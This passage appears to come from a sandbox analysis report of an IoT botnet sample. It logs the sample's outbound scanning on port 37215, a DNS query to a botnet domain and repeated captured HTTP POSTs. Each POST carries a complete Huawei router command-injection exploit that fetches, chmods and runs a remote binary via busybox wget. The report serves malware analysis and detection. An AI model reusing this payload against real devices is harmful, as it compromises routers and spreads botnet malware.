            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.65.163.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 183.142.207.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 62.152.99.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 101.153.97.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 31.145.193.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 166.105.217.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.46.232.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.235.119.159:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.151.3.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.73.123.186:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 204.143.53.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 197.44.34.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 115.44.199.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.105.115.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.49.25.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.227.198.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 157.151.126.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:4606 -> 41.86.137.2:37215
            Source: unknownDNS traffic detected: query: botnet.layer4.vip replaycode: Name error (3)
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:s
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 34 2e 31 33 2e 36 2e 36 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 154.13.6.69 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 454Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:s
